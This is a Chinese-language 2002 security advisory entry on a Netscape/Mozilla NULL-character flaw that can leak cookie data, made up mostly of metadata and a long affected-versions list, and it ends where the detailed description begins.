|
|
Netscape/Mozilla NULL字符可导致COOKIE信息泄露漏洞
发布时间:2002-01-25
更新时间:2002-01-25
严重程度:中
威胁程度:服务器信息泄露
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:3925
受影响系统Mozilla Browser 0.9.2.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.2
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.3
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.4.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.4
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.5
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.6
- Apple MacOS 9.0
- Apple MacOS 9.1
- Apple MacOS 9.2
- Be BeOS 5.0
- BSDI BSD/OS 4.2
- Compaq OpenVMS 7.1-2 Alpha
- Compaq OpenVMS 7.2-2 Alpha
- Compaq OpenVMS 7.3 Alpha
- FreeBSD FreeBSD 4.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- SGI IRIX 6.5
- Sun Solaris 2.7
- Sun Solaris 2.8
Netscape Communicator 4.08
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.07
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.06
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.05
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.04
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.0
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.5BETA
Netscape Communicator 4.5
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.6
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.7
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.51
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.61
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.72
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.0es
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.73
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.0es
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.74
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.75
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.76
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.77
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 3.0
- Conectiva Linux 4.0
- Conectiva Linux 4.1
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- MandrakeSoft Linux Mandrake 6.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- S.u.S.E. Linux 7.0
Netscape Communicator 4.78
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 2000 Workstation SP3
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Netscape Netscape 4.77 Mac
- Apple MacOS 6.0.8
- Apple MacOS 7.0
- Apple MacOS 7.0.1
- Apple MacOS 7.1
- Apple MacOS 7.1.2
- Apple MacOS 7.5.1
- Apple MacOS 7.5.2
- Apple MacOS 7.5.3
- Apple MacOS 7.6
- Apple MacOS 7.6.1
- Apple MacOS 8.0
- Apple MacOS 8.1
- Apple MacOS 8.5
- Apple MacOS 8.6
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
Netscape Netscape 6.0 Mac
Netscape Netscape 6.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Netscape Netscape 6.2
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
not vulnerable Mozilla Browser 0.9.7
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP
Netscape Netscape 6.2.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows XP 详细描述
Mozilla是一款免费开放源代码WEB浏览器,运行在UNIX系统上,Netscape也是比较
